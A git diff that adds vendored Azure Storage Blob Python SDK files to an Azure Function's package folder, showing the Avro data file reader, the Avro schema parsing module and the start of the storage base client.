the future read, + # no need to downloading from the beginning of avro. + if hasattr(self._reader, 'object_position'): + self.reader.track_object_position() + + # header_reader indicates reader only has partial content. The reader doesn't have block header, + # so we read use the block count stored last time. + # Also ChangeFeed only has codec==null, so use _raw_decoder is good. + if self._header_reader is not None: + self._datum_decoder = self._raw_decoder + self.datum_reader.writer_schema = ( + schema.parse(self.get_meta(SCHEMA_KEY).decode('utf-8'))) + return self + + async def __aenter__(self): + return self + + async def __aexit__(self, data_type, value, traceback): + # Perform a close if there's no exception + if data_type is None: + self.close() + + def __aiter__(self): + return self + + # read-only properties + @property + def reader(self): + return self._reader + + @property + def raw_decoder(self): + return self._raw_decoder + + @property + def datum_decoder(self): + return self._datum_decoder + + @property + def datum_reader(self): + return self._datum_reader + + @property + def sync_marker(self): + return self._sync_marker + + @property + def meta(self): + return self._meta + + # read/write properties + @property + def block_count(self): + return self._block_count + + def get_meta(self, key): + """Reports the value of a given metadata key. + + Args: + key: Metadata key (string) to report the value of. + Returns: + Value associated to the metadata key, as bytes. + """ + return self._meta.get(key) + + async def _read_header(self): + header_reader = self._header_reader if self._header_reader else self._reader + header_decoder = self._header_decoder if self._header_decoder else self._raw_decoder + + # seek to the beginning of the file to get magic block + await header_reader.seek(0, 0) + + # read header into a dict + header = await self.datum_reader.read_data(META_SCHEMA, header_decoder) + + # check magic number + if header.get('magic') != MAGIC: + fail_msg = "Not an Avro data file: %s doesn't match %s." \ + % (header.get('magic'), MAGIC) + raise schema.AvroException(fail_msg) + + # set metadata + self._meta = header['meta'] + + # set sync marker + self._sync_marker = header['sync'] + + async def _read_block_header(self): + self._block_count = await self.raw_decoder.read_long() + if self.codec == "null": + # Skip a long; we don't need to use the length. + await self.raw_decoder.skip_long() + self._datum_decoder = self._raw_decoder + else: + raise DataFileException("Unknown codec: %r" % self.codec) + + async def _skip_sync(self): + """ + Read the length of the sync marker; if it matches the sync marker, + return True. Otherwise, seek back to where we started and return False. + """ + proposed_sync_marker = await self.reader.read(SYNC_SIZE) + if SYNC_SIZE > 0 and not proposed_sync_marker: + raise StopAsyncIteration + if proposed_sync_marker != self.sync_marker: + await self.reader.seek(-SYNC_SIZE, 1) + + async def __anext__(self): + """Return the next datum in the file.""" + if self.block_count == 0: + await self._skip_sync() + + # object_position is to support reading from current position in the future read, + # no need to downloading from the beginning of avro file with this attr. + if hasattr(self._reader, 'object_position'): + await self.reader.track_object_position() + self._cur_object_index = 0 + + await self._read_block_header() + + datum = await self.datum_reader.read(self.datum_decoder) + self._block_count -= 1 + self._cur_object_index += 1 + + # object_position is to support reading from current position in the future read, + # This will track the index of the next item to be read. + # This will also track the offset before the next sync marker. + if hasattr(self._reader, 'object_position'): + if self.block_count == 0: + # the next event to be read is at index 0 in the new chunk of blocks, + await self.reader.track_object_position() + await self.reader.set_object_index(0) + else: + await self.reader.set_object_index(self._cur_object_index) + + return datum + + def close(self): + """Close this reader.""" + self.reader.close() + + +if __name__ == '__main__': + raise Exception('Not a standalone module') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/schema.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/schema.py new file mode 100644 index 0000000..68d2819 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/schema.py @@ -0,0 +1,1221 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-many-lines + +"""Representation of Avro schemas. + +A schema may be one of: + - A record, mapping field names to field value data; + - An error, equivalent to a record; + - An enum, containing one of a small set of symbols; + - An array of values, all of the same schema; + - A map containing string/value pairs, each of a declared schema; + - A union of other schemas; + - A fixed sized binary object; + - A unicode string; + - A sequence of bytes; + - A 32-bit signed int; + - A 64-bit signed long; + - A 32-bit floating-point float; + - A 64-bit floating-point double; + - A boolean; + - Null. +""" + +import abc +import json +import logging +import re +import sys +from six import with_metaclass + +PY2 = sys.version_info[0] == 2 + +if PY2: + _str = unicode # pylint: disable=undefined-variable +else: + _str = str + +logger = logging.getLogger(__name__) + +# ------------------------------------------------------------------------------ +# Constants + +# Log level more verbose than DEBUG=10, INFO=20, etc. +DEBUG_VERBOSE = 5 + +NULL = 'null' +BOOLEAN = 'boolean' +STRING = 'string' +BYTES = 'bytes' +INT = 'int' +LONG = 'long' +FLOAT = 'float' +DOUBLE = 'double' +FIXED = 'fixed' +ENUM = 'enum' +RECORD = 'record' +ERROR = 'error' +ARRAY = 'array' +MAP = 'map' +UNION = 'union' + +# Request and error unions are part of Avro protocols: +REQUEST = 'request' +ERROR_UNION = 'error_union' + +PRIMITIVE_TYPES = frozenset([ + NULL, + BOOLEAN, + STRING, + BYTES, + INT, + LONG, + FLOAT, + DOUBLE, +]) + +NAMED_TYPES = frozenset([ + FIXED, + ENUM, + RECORD, + ERROR, +]) + +VALID_TYPES = frozenset.union( + PRIMITIVE_TYPES, + NAMED_TYPES, + [ + ARRAY, + MAP, + UNION, + REQUEST, + ERROR_UNION, + ], +) + +SCHEMA_RESERVED_PROPS = frozenset([ + 'type', + 'name', + 'namespace', + 'fields', # Record + 'items', # Array + 'size', # Fixed + 'symbols', # Enum + 'values', # Map + 'doc', +]) + +FIELD_RESERVED_PROPS = frozenset([ + 'default', + 'name', + 'doc', + 'order', + 'type', +]) + +VALID_FIELD_SORT_ORDERS = frozenset([ + 'ascending', + 'descending', + 'ignore', +]) + + +# ------------------------------------------------------------------------------ +# Exceptions + + +class Error(Exception): + """Base class for errors in this module.""" + + +class AvroException(Error): + """Generic Avro schema error.""" + + +class SchemaParseException(AvroException): + """Error while parsing a JSON schema descriptor.""" + + +class Schema(with_metaclass(abc.ABCMeta, object)): + """Abstract base class for all Schema classes.""" + + def __init__(self, data_type, other_props=None): + """Initializes a new schema object. + + Args: + data_type: Type of the schema to initialize. + other_props: Optional dictionary of additional properties. + """ + if data_type not in VALID_TYPES: + raise SchemaParseException('%r is not a valid Avro type.' % data_type) + + # All properties of this schema, as a map: property name -> property value + self._props = {} + + self._props['type'] = data_type + self._type = data_type + + if other_props: + self._props.update(other_props) + + @property + def namespace(self): + """Returns: the namespace this schema belongs to, if any, or None.""" + return self._props.get('namespace', None) + + @property + def type(self): + """Returns: the type of this schema.""" + return self._type + + @property + def doc(self): + """Returns: the documentation associated to this schema, if any, or None.""" + return self._props.get('doc', None) + + @property + def props(self): + """Reports all the properties of this schema. + + Includes all properties, reserved and non reserved. + JSON properties of this schema are directly generated from this dict. + + Returns: + A dictionary of properties associated to this schema. + """ + return self._props + + @property + def other_props(self): + """Returns: the dictionary of non-reserved properties.""" + return dict(filter_keys_out(items=self._props, keys=SCHEMA_RESERVED_PROPS)) + + def __str__(self): + """Returns: the JSON representation of this schema.""" + return json.dumps(self.to_json(names=None)) + + @abc.abstractmethod + def to_json(self, names): + """Converts the schema object into its AVRO specification representation. + + Schema types that have names (records, enums, and fixed) must + be aware of not re-defining schemas that are already listed + in the parameter names. + """ + raise Exception('Cannot run abstract method.') + + +# ------------------------------------------------------------------------------ + + +_RE_NAME = re.compile(r'[A-Za-z_][A-Za-z0-9_]*') + +_RE_FULL_NAME = re.compile( + r'^' + r'[.]?(?:[A-Za-z_][A-Za-z0-9_]*[.])*' # optional namespace + r'([A-Za-z_][A-Za-z0-9_]*)' # name + r'$' +) + + +class Name(object): + """Representation of an Avro name.""" + + def __init__(self, name, namespace=None): + """Parses an Avro name. + + Args: + name: Avro name to parse (relative or absolute). + namespace: Optional explicit namespace if the name is relative. + """ + # Normalize: namespace is always defined as a string, possibly empty. + if namespace is None: + namespace = '' + + if '.' in name: + # name is absolute, namespace is ignored: + self._fullname = name + + match = _RE_FULL_NAME.match(self._fullname) + if match is None: + raise SchemaParseException( + 'Invalid absolute schema name: %r.' % self._fullname) + + self._name = match.group(1) + self._namespace = self._fullname[:-(len(self._name) + 1)] + + else: + # name is relative, combine with explicit namespace: + self._name = name + self._namespace = namespace + self._fullname = (self._name + if (not self._namespace) else + '%s.%s' % (self._namespace, self._name)) + + # Validate the fullname: + if _RE_FULL_NAME.match(self._fullname) is None: + raise SchemaParseException( + 'Invalid schema name %r infered from name %r and namespace %r.' + % (self._fullname, self._name, self._namespace)) + + def __eq__(self, other): + if not isinstance(other, Name): + return NotImplemented + return self.fullname == other.fullname + + @property + def simple_name(self): + """Returns: the simple name part of this name.""" + return self._name + + @property + def namespace(self): + """Returns: this name's namespace, possible the empty string.""" + return self._namespace + + @property + def fullname(self): + """Returns: the full name.""" + return self._fullname + + +# ------------------------------------------------------------------------------ + + +class Names(object): + """Tracks Avro named schemas and default namespace during parsing.""" + + def __init__(self, default_namespace=None, names=None): + """Initializes a new name tracker. + + Args: + default_namespace: Optional default namespace. + names: Optional initial mapping of known named schemas. + """ + if names is None: + names = {} + self._names = names + self._default_namespace = default_namespace + + @property + def names(self): + """Returns: the mapping of known named schemas.""" + return self._names + + @property + def default_namespace(self): + """Returns: the default namespace, if any, or None.""" + return self._default_namespace + + def new_with_default_namespace(self, namespace): + """Creates a new name tracker from this tracker, but with a new default ns. + + Args: + namespace: New default namespace to use. + Returns: + New name tracker with the specified default namespace. + """ + return Names(names=self._names, default_namespace=namespace) + + def get_name(self, name, namespace=None): + """Resolves the Avro name according to this name tracker's state. + + Args: + name: Name to resolve (absolute or relative). + namespace: Optional explicit namespace. + Returns: + The specified name, resolved according to this tracker. + """ + if namespace is None: + namespace = self._default_namespace + return Name(name=name, namespace=namespace) + + def get_schema(self, name, namespace=None): + """Resolves an Avro schema by name. + + Args: + name: Name (relative or absolute) of the Avro schema to look up. + namespace: Optional explicit namespace. + Returns: + The schema with the specified name, if any, or None. + """ + avro_name = self.get_name(name=name, namespace=namespace) + return self._names.get(avro_name.fullname, None) + + def prune_namespace(self, properties): + """given a properties, return properties with namespace removed if + it matches the own default namespace + """ + if self.default_namespace is None: + # I have no default -- no change + return properties + if 'namespace' not in properties: + # he has no namespace - no change + return properties + if properties['namespace'] != self.default_namespace: + # we're different - leave his stuff alone + return properties + # we each have a namespace and it's redundant. delete his. + prunable = properties.copy() + del prunable['namespace'] + return prunable + + def register(self, schema): + """Registers a new named schema in this tracker. + + Args: + schema: Named Avro schema to register in this tracker. + """ + if schema.fullname in VALID_TYPES: + raise SchemaParseException( + '%s is a reserved type name.' % schema.fullname) + if schema.fullname in self.names: + raise SchemaParseException( + 'Avro name %r already exists.' % schema.fullname) + + logger.log(DEBUG_VERBOSE, 'Register new name for %r', schema.fullname) + self._names[schema.fullname] = schema + + +# ------------------------------------------------------------------------------ + + +class NamedSchema(Schema): + """Abstract base class for named schemas. + + Named schemas are enumerated in NAMED_TYPES. + """ + + def __init__( + self, + data_type, + name=None, + namespace=None, + names=None, + other_props=None, + ): + """Initializes a new named schema object. + + Args: + data_type: Type of the named schema. + name: Name (absolute or relative) of the schema. + namespace: Optional explicit namespace if name is relative. + names: Tracker to resolve and register Avro names. + other_props: Optional map of additional properties of the schema. + """ + assert (data_type in NAMED_TYPES), ('Invalid named type: %r' % data_type) + self._avro_name = names.get_name(name=name, namespace=namespace) + + super(NamedSchema, self).__init__(data_type, other_props) + + names.register(self) + + self._props['name'] = self.name + if self.namespace: + self._props['namespace'] = self.namespace + + @property + def avro_name(self): + """Returns: the Name object describing this schema's name.""" + return self._avro_name + + @property + def name(self): + return self._avro_name.simple_name + + @property + def namespace(self): + return self._avro_name.namespace + + @property + def fullname(self): + return self._avro_name.fullname + + def name_ref(self, names): + """Reports this schema name relative to the specified name tracker. + + Args: + names: Avro name tracker to relativise this schema name against. + Returns: + This schema name, relativised against the specified name tracker. + """ + if self.namespace == names.default_namespace: + return self.name + return self.fullname + + @abc.abstractmethod + def to_json(self, names): + """Converts the schema object into its AVRO specification representation. + + Schema types that have names (records, enums, and fixed) must + be aware of not re-defining schemas that are already listed + in the parameter names. + """ + raise Exception('Cannot run abstract method.') + +# ------------------------------------------------------------------------------ + + +_NO_DEFAULT = object() + + +class Field(object): + """Representation of the schema of a field in a record.""" + + def __init__( + self, + data_type, + name, + index, + has_default, + default=_NO_DEFAULT, + order=None, + doc=None, + other_props=None + ): + """Initializes a new Field object. + + Args: + data_type: Avro schema of the field. + name: Name of the field. + index: 0-based position of the field. + has_default: + default: + order: + doc: + other_props: + """ + if (not isinstance(name, _str)) or (not name): + raise SchemaParseException('Invalid record field name: %r.' % name) + if (order is not None) and (order not in VALID_FIELD_SORT_ORDERS): + raise SchemaParseException('Invalid record field order: %r.' % order) + + # All properties of this record field: + self._props = {} + + self._has_default = has_default + if other_props: + self._props.update(other_props) + + self._index = index + self._type = self._props['type'] = data_type + self._name = self._props['name'] = name + + if has_default: + self._props['default'] = default + + if order is not None: + self._props['order'] = order + + if doc is not None: + self._props['doc'] = doc + + @property + def type(self): + """Returns: the schema of this field.""" + return self._type + + @property + def name(self): + """Returns: this field name.""" + return self._name + + @property + def index(self): + """Returns: the 0-based index of this field in the record.""" + return self._index + + @property + def default(self): + return self._props['default'] + + @property + def has_default(self): + return self._has_default + + @property + def order(self): + return self._props.get('order', None) + + @property + def doc(self): + return self._props.get('doc', None) + + @property + def props(self): + return self._props + + @property + def other_props(self): + return filter_keys_out(items=self._props, keys=FIELD_RESERVED_PROPS) + + def __str__(self): + return json.dumps(self.to_json()) + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = self.props.copy() + to_dump['type'] = self.type.to_json(names) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ +# Primitive Types + + +class PrimitiveSchema(Schema): + """Schema of a primitive Avro type. + + Valid primitive types are defined in PRIMITIVE_TYPES. + """ + + def __init__(self, data_type, other_props=None): + """Initializes a new schema object for the specified primitive type. + + Args: + data_type: Type of the schema to construct. Must be primitive. + """ + if data_type not in PRIMITIVE_TYPES: + raise AvroException('%r is not a valid primitive type.' % data_type) + super(PrimitiveSchema, self).__init__(data_type, other_props=other_props) + + @property + def name(self): + """Returns: the simple name of this schema.""" + # The name of a primitive type is the type itself. + return self.type + + @property + def fullname(self): + """Returns: the fully qualified name of this schema.""" + # The full name is the simple name for primitive schema. + return self.name + + def to_json(self, names=None): + if len(self.props) == 1: + return self.fullname + return self.props + + def __eq__(self, that): + return self.props == that.props + + +# ------------------------------------------------------------------------------ +# Complex Types (non-recursive) + + +class FixedSchema(NamedSchema): + def __init__( + self, + name, + namespace, + size, + names=None, + other_props=None, + ): + # Ensure valid ctor args + if not isinstance(size, int): + fail_msg = 'Fixed Schema requires a valid integer for size property.' + raise AvroException(fail_msg) + + super(FixedSchema, self).__init__( + data_type=FIXED, + name=name, + namespace=namespace, + names=names, + other_props=other_props, + ) + self._props['size'] = size + + @property + def size(self): + """Returns: the size of this fixed schema, in bytes.""" + return self._props['size'] + + def to_json(self, names=None): + if names is None: + names = Names() + if self.fullname in names.names: + return self.name_ref(names) + names.names[self.fullname] = self + return names.prune_namespace(self.props) + + def __eq__(self, that): + return self.props == that.props + + +# ------------------------------------------------------------------------------ + + +class EnumSchema(NamedSchema): + def __init__( + self, + name, + namespace, + symbols, + names=None, + doc=None, + other_props=None, + ): + """Initializes a new enumeration schema object. + + Args: + name: Simple name of this enumeration. + namespace: Optional namespace. + symbols: Ordered list of symbols defined in this enumeration. + names: + doc: + other_props: + """ + symbols = tuple(symbols) + symbol_set = frozenset(symbols) + if (len(symbol_set) != len(symbols) + or not all(map(lambda symbol: isinstance(symbol, _str), symbols))): + raise AvroException( + 'Invalid symbols for enum schema: %r.' % (symbols,)) + + super(EnumSchema, self).__init__( + data_type=ENUM, + name=name, + namespace=namespace, + names=names, + other_props=other_props, + ) + + self._props['symbols'] = symbols + if doc is not None: + self._props['doc'] = doc + + @property + def symbols(self): + """Returns: the symbols defined in this enum.""" + return self._props['symbols'] + + def to_json(self, names=None): + if names is None: + names = Names() + if self.fullname in names.names: + return self.name_ref(names) + names.names[self.fullname] = self + return names.prune_namespace(self.props) + + def __eq__(self, that): + return self.props == that.props + + +# ------------------------------------------------------------------------------ +# Complex Types (recursive) + + +class ArraySchema(Schema): + """Schema of an array.""" + + def __init__(self, items, other_props=None): + """Initializes a new array schema object. + + Args: + items: Avro schema of the array items. + other_props: + """ + super(ArraySchema, self).__init__( + data_type=ARRAY, + other_props=other_props, + ) + self._items_schema = items + self._props['items'] = items + + @property + def items(self): + """Returns: the schema of the items in this array.""" + return self._items_schema + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = self.props.copy() + item_schema = self.items + to_dump['items'] = item_schema.to_json(names) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ + + +class MapSchema(Schema): + """Schema of a map.""" + + def __init__(self, values, other_props=None): + """Initializes a new map schema object. + + Args: + values: Avro schema of the map values. + other_props: + """ + super(MapSchema, self).__init__( + data_type=MAP, + other_props=other_props, + ) + self._values_schema = values + self._props['values'] = values + + @property + def values(self): + """Returns: the schema of the values in this map.""" + return self._values_schema + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = self.props.copy() + to_dump['values'] = self.values.to_json(names) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ + + +class UnionSchema(Schema): + """Schema of a union.""" + + def __init__(self, schemas): + """Initializes a new union schema object. + + Args: + schemas: Ordered collection of schema branches in the union. + """ + super(UnionSchema, self).__init__(data_type=UNION) + self._schemas = tuple(schemas) + + # Validate the schema branches: + + # All named schema names are unique: + named_branches = tuple( + filter(lambda schema: schema.type in NAMED_TYPES, self._schemas)) + unique_names = frozenset(map(lambda schema: schema.fullname, named_branches)) + if len(unique_names) != len(named_branches): + raise AvroException( + 'Invalid union branches with duplicate schema name:%s' + % ''.join(map(lambda schema: ('\n\t - %s' % schema), self._schemas))) + + # Types are unique within unnamed schemas, and union is not allowed: + unnamed_branches = tuple( + filter(lambda schema: schema.type not in NAMED_TYPES, self._schemas)) + unique_types = frozenset(map(lambda schema: schema.type, unnamed_branches)) + if UNION in unique_types: + raise AvroException( + 'Invalid union branches contain other unions:%s' + % ''.join(map(lambda schema: ('\n\t - %s' % schema), self._schemas))) + if len(unique_types) != len(unnamed_branches): + raise AvroException( + 'Invalid union branches with duplicate type:%s' + % ''.join(map(lambda schema: ('\n\t - %s' % schema), self._schemas))) + + @property + def schemas(self): + """Returns: the ordered list of schema branches in the union.""" + return self._schemas + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = [] + for schema in self.schemas: + to_dump.append(schema.to_json(names)) + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ + + +class ErrorUnionSchema(UnionSchema): + """Schema representing the declared errors of a protocol message.""" + + def __init__(self, schemas): + """Initializes an error-union schema. + + Args: + schema: collection of error schema. + """ + # Prepend "string" to handle system errors + schemas = [PrimitiveSchema(data_type=STRING)] + list(schemas) + super(ErrorUnionSchema, self).__init__(schemas=schemas) + + def to_json(self, names=None): + if names is None: + names = Names() + to_dump = [] + for schema in self.schemas: + # Don't print the system error schema + if schema.type == STRING: + continue + to_dump.append(schema.to_json(names)) + return to_dump + + +# ------------------------------------------------------------------------------ + + +class RecordSchema(NamedSchema): + """Schema of a record.""" + + @staticmethod + def _make_field(index, field_desc, names): + """Builds field schemas from a list of field JSON descriptors. + + Args: + index: 0-based index of the field in the record. + field_desc: JSON descriptors of a record field. + Return: + The field schema. + """ + field_schema = schema_from_json_data( + json_data=field_desc['type'], + names=names, + ) + other_props = ( + dict(filter_keys_out(items=field_desc, keys=FIELD_RESERVED_PROPS))) + return Field( + data_type=field_schema, + name=field_desc['name'], + index=index, + has_default=('default' in field_desc), + default=field_desc.get('default', _NO_DEFAULT), + order=field_desc.get('order', None), + doc=field_desc.get('doc', None), + other_props=other_props, + ) + + @staticmethod + def make_field_list(field_desc_list, names): + """Builds field schemas from a list of field JSON descriptors. + + Guarantees field name unicity. + + Args: + field_desc_list: collection of field JSON descriptors. + names: Avro schema tracker. + Yields + Field schemas. + """ + for index, field_desc in enumerate(field_desc_list): + yield RecordSchema._make_field(index, field_desc, names) + + @staticmethod + def _make_field_map(fields): + """Builds the field map. + + Guarantees field name unicity. + + Args: + fields: iterable of field schema. + Returns: + A map of field schemas, indexed by name. + """ + field_map = {} + for field in fields: + if field.name in field_map: + raise SchemaParseException( + 'Duplicate record field name %r.' % field.name) + field_map[field.name] = field + return field_map + + def __init__( + self, + name, + namespace, + fields=None, + make_fields=None, + names=None, + record_type=RECORD, + doc=None, + other_props=None + ): + """Initializes a new record schema object. + + Args: + name: Name of the record (absolute or relative). + namespace: Optional namespace the record belongs to, if name is relative. + fields: collection of fields to add to this record. + Exactly one of fields or make_fields must be specified. + make_fields: function creating the fields that belong to the record. + The function signature is: make_fields(names) -> ordered field list. + Exactly one of fields or make_fields must be specified. + names: + record_type: Type of the record: one of RECORD, ERROR or REQUEST. + Protocol requests are not named. + doc: + other_props: + """ + if record_type == REQUEST: + # Protocol requests are not named: + super(RecordSchema, self).__init__( + data_type=REQUEST, + other_props=other_props, + ) + elif record_type in [RECORD, ERROR]: + # Register this record name in the tracker: + super(RecordSchema, self).__init__( + data_type=record_type, + name=name, + namespace=namespace, + names=names, + other_props=other_props, + ) + else: + raise SchemaParseException( + 'Invalid record type: %r.' % record_type) + + if record_type in [RECORD, ERROR]: + avro_name = names.get_name(name=name, namespace=namespace) + nested_names = names.new_with_default_namespace(namespace=avro_name.namespace) + elif record_type == REQUEST: + # Protocol request has no name: no need to change default namespace: + nested_names = names + + if fields is None: + fields = make_fields(names=nested_names) + else: + assert make_fields is None + self._fields = tuple(fields) + + self._field_map = RecordSchema._make_field_map(self._fields) + + self._props['fields'] = fields + if doc is not None: + self._props['doc'] = doc + + @property + def fields(self): + """Returns: the field schemas, as an ordered tuple.""" + return self._fields + + @property + def field_map(self): + """Returns: a read-only map of the field schemas index by field names.""" + return self._field_map + + def to_json(self, names=None): + if names is None: + names = Names() + # Request records don't have names + if self.type == REQUEST: + return [f.to_json(names) for f in self.fields] + + if self.fullname in names.names: + return self.name_ref(names) + names.names[self.fullname] = self + + to_dump = names.prune_namespace(self.props.copy()) + to_dump['fields'] = [f.to_json(names) for f in self.fields] + return to_dump + + def __eq__(self, that): + to_cmp = json.loads(_str(self)) + return to_cmp == json.loads(_str(that)) + + +# ------------------------------------------------------------------------------ +# Module functions + + +def filter_keys_out(items, keys): + """Filters a collection of (key, value) items. + + Exclude any item whose key belongs to keys. + + Args: + items: Dictionary of items to filter the keys out of. + keys: Keys to filter out. + Yields: + Filtered items. + """ + for key, value in items.items(): + if key in keys: + continue + yield key, value + + +# ------------------------------------------------------------------------------ + + +def _schema_from_json_string(json_string, names): + if json_string in PRIMITIVE_TYPES: + return PrimitiveSchema(data_type=json_string) + + # Look for a known named schema: + schema = names.get_schema(name=json_string) + if schema is None: + raise SchemaParseException( + 'Unknown named schema %r, known names: %r.' + % (json_string, sorted(names.names))) + return schema + + +def _schema_from_json_array(json_array, names): + def MakeSchema(desc): + return schema_from_json_data(json_data=desc, names=names) + + return UnionSchema(map(MakeSchema, json_array)) + + +def _schema_from_json_object(json_object, names): + data_type = json_object.get('type') + if data_type is None: + raise SchemaParseException( + 'Avro schema JSON descriptor has no "type" property: %r' % json_object) + + other_props = dict( + filter_keys_out(items=json_object, keys=SCHEMA_RESERVED_PROPS)) + + if data_type in PRIMITIVE_TYPES: + # FIXME should not ignore other properties + result = PrimitiveSchema(data_type, other_props=other_props) + + elif data_type in NAMED_TYPES: + name = json_object.get('name') + namespace = json_object.get('namespace', names.default_namespace) + if data_type == FIXED: + size = json_object.get('size') + result = FixedSchema(name, namespace, size, names, other_props) + elif data_type == ENUM: + symbols = json_object.get('symbols') + doc = json_object.get('doc') + result = EnumSchema(name, namespace, symbols, names, doc, other_props) + + elif data_type in [RECORD, ERROR]: + field_desc_list = json_object.get('fields', ()) + + def MakeFields(names): + return tuple(RecordSchema.make_field_list(field_desc_list, names)) + + result = RecordSchema( + name=name, + namespace=namespace, + make_fields=MakeFields, + names=names, + record_type=data_type, + doc=json_object.get('doc'), + other_props=other_props, + ) + else: + raise Exception('Internal error: unknown type %r.' % data_type) + + elif data_type in VALID_TYPES: + # Unnamed, non-primitive Avro type: + + if data_type == ARRAY: + items_desc = json_object.get('items') + if items_desc is None: + raise SchemaParseException( + 'Invalid array schema descriptor with no "items" : %r.' + % json_object) + result = ArraySchema( + items=schema_from_json_data(items_desc, names), + other_props=other_props, + ) + + elif data_type == MAP: + values_desc = json_object.get('values') + if values_desc is None: + raise SchemaParseException( + 'Invalid map schema descriptor with no "values" : %r.' + % json_object) + result = MapSchema( + values=schema_from_json_data(values_desc, names=names), + other_props=other_props, + ) + + elif data_type == ERROR_UNION: + error_desc_list = json_object.get('declared_errors') + assert error_desc_list is not None + error_schemas = map( + lambda desc: schema_from_json_data(desc, names=names), + error_desc_list) + result = ErrorUnionSchema(schemas=error_schemas) + + else: + raise Exception('Internal error: unknown type %r.' % data_type) + else: + raise SchemaParseException( + 'Invalid JSON descriptor for an Avro schema: %r' % json_object) + return result + + +# Parsers for the JSON data types: +_JSONDataParserTypeMap = { + _str: _schema_from_json_string, + list: _schema_from_json_array, + dict: _schema_from_json_object, +} + + +def schema_from_json_data(json_data, names=None): + """Builds an Avro Schema from its JSON descriptor. + + Args: + json_data: JSON data representing the descriptor of the Avro schema. + names: Optional tracker for Avro named schemas. + Returns: + The Avro schema parsed from the JSON descriptor. + Raises: + SchemaParseException: if the descriptor is invalid. + """ + if names is None: + names = Names() + + # Select the appropriate parser based on the JSON data type: + parser = _JSONDataParserTypeMap.get(type(json_data)) + if parser is None: + raise SchemaParseException( + 'Invalid JSON descriptor for an Avro schema: %r.' % json_data) + return parser(json_data, names=names) + + +# ------------------------------------------------------------------------------ + + +def parse(json_string): + """Constructs a Schema from its JSON descriptor in text form. + + Args: + json_string: String representation of the JSON descriptor of the schema. + Returns: + The parsed schema. + Raises: + SchemaParseException: on JSON parsing error, + or if the JSON descriptor is invalid. + """ + try: + json_data = json.loads(json_string) + except Exception as exn: + raise SchemaParseException( + 'Error parsing schema from JSON: %r. ' + 'Error message: %r.' + % (json_string, exn)) + + # Initialize the names object + names = Names() + + # construct the Avro Schema object + return schema_from_json_data(json_data, names) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client.py new file mode 100644 index 0000000..85fde97 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client.py @@ -0,0 +1,463 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import logging +import uuid +from typing import ( # pylint: disable=unused-import + Optional, + Any, + Tuple, +) + +try: + from urllib.parse import parse_qs, quote +except ImportError: + from urlparse import parse_qs # type: ignore + from urllib2 import quote # type: ignore + +import six + +from azure.core.configuration import Configuration +from azure.core.credentials import AzureSasCredential +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline import Pipeline +from azure.core.pipeline.transport import RequestsTransport, HttpTransport +from azure.core.pipeline.policies import ( + AzureSasCredentialPolicy, + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + RedirectPolicy, + ProxyPolicy, + UserAgentPolicy, +) + +from .constants import CONNECTION_TIMEOUT, READ_TIMEOUT, SERVICE_HOST_BASE +from .models import LocationMode +from .authentication import SharedKeyCredentialPolicy +from .shared_access_signature import QueryStringConstants +from .request_handlers import serialize_batch_body, _get_batch_request_delimiter +from .policies import ( + ExponentialRetry, + StorageBearerTokenCredentialPolicy, + StorageContentValidation, + StorageHeadersPolicy, + StorageHosts, + StorageLoggingPolicy, + StorageRequestHook, + StorageResponseHook, + QueueMessagePolicy, +) +from .._version import VERSION +from .response_handlers import process_storage_error, PartialBatchErrorException + + +_LOGGER = logging.getLogger(__name__) +_SERVICE_PARAMS = { + "blob": {"primary": "BLOBENDPOINT", "secondary": "BLOBSECONDARYENDPOINT"}, + "queue": {"primary": "QUEUEENDPOINT", "secondary": "QUEUESECONDARYENDPOINT"}, + "file": {"primary": "FILEENDPOINT", "secondary": "FILESECONDARYENDPOINT"}, + "dfs": {"primary": "BLOBENDPOINT", "secondary": "BLOBENDPOINT"}, +} + + +class StorageAccountHostsMixin(object): # pylint: disable=too-many-instance-attributes + def __init__( + self, + parsed_url, # type: Any + service, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + self._location_mode = kwargs.get("_location_mode", LocationMode.PRIMARY) + self._hosts = kwargs.get("_hosts") + self.scheme = parsed_url.scheme + + if service not in ["blob", "queue", "file-share", "dfs"]: + raise ValueError("Invalid service: {}".format(service)) + service_name = service.split('-')[0] + account = parsed_url.netloc.split(".{}.core.".format(service_name)) + + self.account_name = account[0] if len(account) > 1 else None + if not self.account_name and parsed_url.netloc.startswith("localhost") \ + or parsed_url.netloc.startswith("127.0.0.1"): + self.account_name = parsed_url.path.strip("/") + + self.credential = _format_shared_key_credential(self.account_name, credential) + if self.scheme.lower() != "https" and hasattr(self.credential, "get_token"): + raise ValueError("Token credential is only supported with HTTPS.") + + secondary_hostname = None + if hasattr(self.credential, "account_name"): + self.account_name = self.credential.account_name + 